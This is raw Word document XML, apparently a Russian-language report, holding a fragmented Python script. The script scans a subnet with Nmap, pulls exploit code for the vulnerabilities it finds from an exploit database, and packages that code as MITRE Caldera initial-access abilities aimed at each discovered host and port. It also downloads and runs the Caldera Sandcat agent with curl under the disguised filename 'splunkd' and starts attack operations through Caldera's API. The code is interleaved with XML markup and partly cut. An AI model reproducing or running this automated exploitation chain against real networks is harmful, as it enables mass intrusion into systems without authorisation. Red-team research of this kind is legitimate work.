          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>found in the response.")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return None, None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else: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      print(f"Failed to fetch URL. Status code: {response.status_code}")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return None, None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save_exploit_code(exploit_code, language, filename):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directory = "data/payloads"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if not </w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>os.path.exists(directory):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os.makedirs(directory)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Determine file extension based on the language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if language == "ruby":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extension = "rb"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elif language == "bash":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extension = "sh"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elif language == "python":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extensio</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n = "py"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else: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extension = language  # Use the language as extension for other script languages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filepath = os.path.join(directory, f"{filename}.{extension}")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with open(filepath, 'w') as file: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file.write(exploit_code)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  <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print(f"Exploit code saved to '{filepath}'")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return os.path.basename(filepath)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# Function to generate unique UUID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generate_uuid():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return str(uuid.uuid4())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# Function to create ability file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create_ability_file(ability_uuid, vuln_data):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  <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"># if the demo_folder directory is not present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if not os.path.exists("data/abilities/initial-access"):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os.makedirs("data/abilities/initial-access") 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filename = f"data/abilities/initial-access/{ability_uuid}.yml"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with open(filename, 'w') as</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> f: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f.write(f"- name: {vuln_data['vulnum']}\n")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f.write(f"  description: read + {vuln_data['URL']}\n")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f.write("  tactic: initial-access\n")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f.write("  technique_id: T1190\n")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f.write(f"  technique_name: {vuln_data['vulnum']}</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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f.write("  executors:\n")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f.write("  - cleanup: []\n")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f.write("   timeout: 1000\n")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f.write("   platform: linux\n")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f.write("   name: sh\n")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f.write("   command: '\n")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f.write(f"     chmod +x </w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{vuln_data['exploit']};\n")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f.write(f"     ./{vuln_data['exploit']} {vuln_data['ip']}:{vuln_data['port']}'\n")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f.write("   payloads:\n")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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      f.write(f"   - {vuln_data['exploit']}\n")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f.write(f"  id: {ability_uuid}\n")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# Function to cre</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ate adversary file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create_adversary_file(adversary_uuid, ability_uuid, vuln_data):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filename = f"data/adversaries/{adversary_uuid}.yml"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with open(filename, 'w') as f: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f.write(f'name: Attack on {vuln_data["vulnum"]}\n')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</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f.write(f'description: Attack on {vuln_data["vulnum"]} and run sandcat\n')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f.write('atomic_ordering: \n')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f.write(f'  - {ability_uuid}\n')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>f.write('  - 2f34977d-9558-4c12-abad-349716777c6b #(установка и запуск агента Калдеры Sandcat)\n')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>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f.write(f'adversary_id: {adversary_uuid}\n')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>def main():</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24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if len(sys.argv) != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2: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>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print("Usage: python script.py &lt;subnet&gt;")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sys.exit(1)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Get subnet from command line argument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subnet = sys.argv[1]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Run Nmap scan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  <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap_output = scan_subnet(subnet)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Parse Nmap output and collect IPs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ips = parse_ips(nmap_output)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Find own IPs within the subnet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own_ips = find_own_ip(subnet)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if own_ips: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print("Own IPs found:", own_ips)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# Remove own IPs fr</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>om collection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ips = [ip for ip in ips if ip not in own_ips]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else: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print("Couldn't find own IP in the subnet.")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Print collected IPs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print("Collected IPs excluding own IPs:")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for ip in ips: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print(ip)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Findings array to s</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tore IP-port tuples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findings = []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Find open ports for each IP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for ip in ips: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nmap_output = scan_ports(ip)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open_ports = parse_open_ports(nmap_output, ip)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findings.extend(open_ports)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lastRenderedPageBreak/>
        <w:t xml:space="preserve">   # Print findings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print("Findings:")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for finding in findings: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print(finding)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global vulnerabilities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vulnerabilities = []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Scan vulnerabilities for each finding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for ip, port in findings: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scan_vulnerabilities(ip, port)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# Parse vulnerabilities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</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parse_vulnerabilities('out1.txt', ip, port)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if os.path.isfile('out1.txt'):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os.remove('out1.txt') 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Save vulnerabilities to a file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with open("vulns.json", "w") as f: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json.dump(vulnerabilities, f, indent=4)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Load JSON re</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cords from file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with open('vulns.json', 'r') as file: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records = json.load(file)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Iterate over each record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for record in records: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ip = record['ip']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port = record['port']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vulnum = record['vulnum']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url = record['URL']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print(f"Processing record: {vulnum}")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# Send request to the provided URL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exploit_code, language = get_exploit_code(f"https://sploitus.com/exploit?id={vulnum}")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if exploit_code and language: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filename = vulnum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exp</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loit_filepath = save_exploit_code(exploit_code, language, filename)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# Update record with exploit filepath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record['exploit'] = exploit_filepath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else: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print("Skipping record due to missing exploit code or language.")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Save </w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>updated records back to vulns.json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with open('vulns.json', 'w') as file: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json.dump(records, file, indent=4)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print("All records processed and updated in vulns.json.")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Read data from vulns.json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with open('vulns.json') as f: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      vul</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ns_data = json.load(f)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Process each record in vulns.json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for vuln_data in vulns_data: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# Check if ability exists, if not generate UUID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if "ability" not in vuln_data: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ability_uuid = generate_uuid()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vuln_data["ability"]</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ability_uuid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create_ability_file(ability_uuid, vuln_data)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else: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ability_uuid = vuln_data["ability"]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# Check if adversary exists, if not generate UUID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if "adversary" not in vuln_data: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adversary_uuid = </w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>generate_uuid()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vuln_data["adversary"] = adversary_uuid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create_adversary_file(adversary_uuid, ability_uuid, vuln_data)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else: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adversary_uuid = vuln_data["adversary"]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Write the updated data back to vulns.json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with open(</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'vulns.json', 'w') as f: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json.dump(vulns_data, f)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Get API_KEY from local.yaml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with open('conf/local.yml') as f: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for line in f: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if 'api_key_red' in line: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     api_key = line.strip().split(':')[1].strip()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Run server.p</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>y in the background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os.system('python server.py &amp;')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time.sleep(90)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Run Caldera Sandcat agent localy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os.system('server="http://0.0.0.0:8888";curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download &gt; splunkd;chmod +x </w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>splunkd;./splunkd -server $server -group red -v &amp;')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time.sleep(30)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# Send requests for each record in vulns.json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for vuln_data in vulns_data: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ip = vuln_data["ip"]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port = vuln_data["port"]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vulnum = vuln_data["vulnum"]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</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> adversary = vuln_data["adversary"]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os.system(f'curl -X PUT -H "KEY:{api_key}" http://localhost:8888/api/rest -d \'{{"index":"operations","name":"{ip}:{port}+{vulnum}","adversary_id":"{adversary}"}}\'')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os.system(f'curl -X POST -H "KEY:{api</w:t>
      </w:r>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_key}" http://localhost:8888/api/rest -d \'{{"index":"operation", "op_id":"{ip}:{port}+{vulnum}", "state":"start"}}\'')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   # Wait for 10 seconds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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      time.sleep(10)   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRPr="002254AB" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002254AB">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   main()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C20097">
      <w:headerReference w:type="even" r:id="rId29"/>
      <w:headerReference w:type="default" r:id="rId30"/>
      <w:footerReference w:type="even" r:id="rId31"/>
      <w:footerReference w:type="default" r:id="rId32"/>
      <w:footerReference w:type="first" r:id="rId33"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="850" w:bottom="1069" w:left="1701" w:header="0" w:footer="464" w:gutter="0"/>
      <w:pgNumType w:start="1"/>
      <w:cols w:space="720"/>
      <w:formProt w:val="0"/>
      <w:titlePg/>
      <w:docGrid w:linePitch="600" w:charSpace="2457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6DD2" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C26DD2" w:rsidRDefault="00C26D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default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  <w:font w:name="Noto Sans Mono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Liberation Sans Narrow">
    <w:altName w:val="Arial"/>
    <w:charset w:val="01"/>
    <w:family w:val="swiss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097" w:rsidRDefault="00C2009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097" w:rsidRDefault="00C2009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097" w:rsidRDefault="00C2009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097" w:rsidRDefault="00C26DD2">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="002254AB">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>2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097" w:rsidRDefault="00C26DD2">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="002254AB">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>3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097" w:rsidRDefault="00C26DD2">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="002254AB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6DD2" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C26DD2" w:rsidRDefault="00C26DD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097" w:rsidRDefault="00C2009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097" w:rsidRDefault="00C2009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097" w:rsidRDefault="00C20097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097" w:rsidRDefault="00C20097"/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0097" w:rsidRDefault="00C20097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544F18"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="44B06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17AF3827"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D818A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336C7952"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C9E3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380A0D63"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4FE4E68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41646739"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="85A8F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7B7B7633"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A0E28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autoHyphenation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097"/>
    <w:rsid w:val="002254AB"/>
    <w:rsid w:val="00C20097"/>
    <w:rsid w:val="00C26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5F04BD7-2E92-4AB1-AC48-36B89250D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Heading"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Noto Serif CJK SC" w:hAnsi="Times New Roman"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numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:firstLine="85"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:bCs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</w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="IndexLink">
    <w:name w:val="Index Link"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SourceText">
    <w:name w:val="Source Text"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:eastAsia="Noto Sans Mono CJK SC" w:hAnsi="Liberation Mono" w:cs="Liberation Mono"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NumberingSymbols">
    <w:name w:val="Numbering Symbols"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="StrongEmphasis">
    <w:name w:val="Strong Emphasis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677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="HeaderandFooter"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="HeaderandFooter"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IndexHeading">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="Heading"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="IndexHeading"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b w:val="0"/>
      <w:sz w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Index"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
      </w:tabs>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Index"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
      </w:tabs>
      <w:ind w:left="283" w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Index"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
      </w:tabs>
      <w:ind w:left="567"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footer" Target="footer6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footer" Target="footer5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er" Target="footer2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sploitus.com/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer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eader" Target="header5.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId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36</Pages>
  <Words>5842</Words>
  <Characters>33301</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>277</Lines>
  <Paragraphs>78</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>39065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79031316996</cp:lastModifiedBy>
  <cp:revision>44</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-31T13:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-10T14:26:00Z</dcterms:modified>
  <dc:language>ru-RU</dc:language>
</cp:coreProperties>
</file>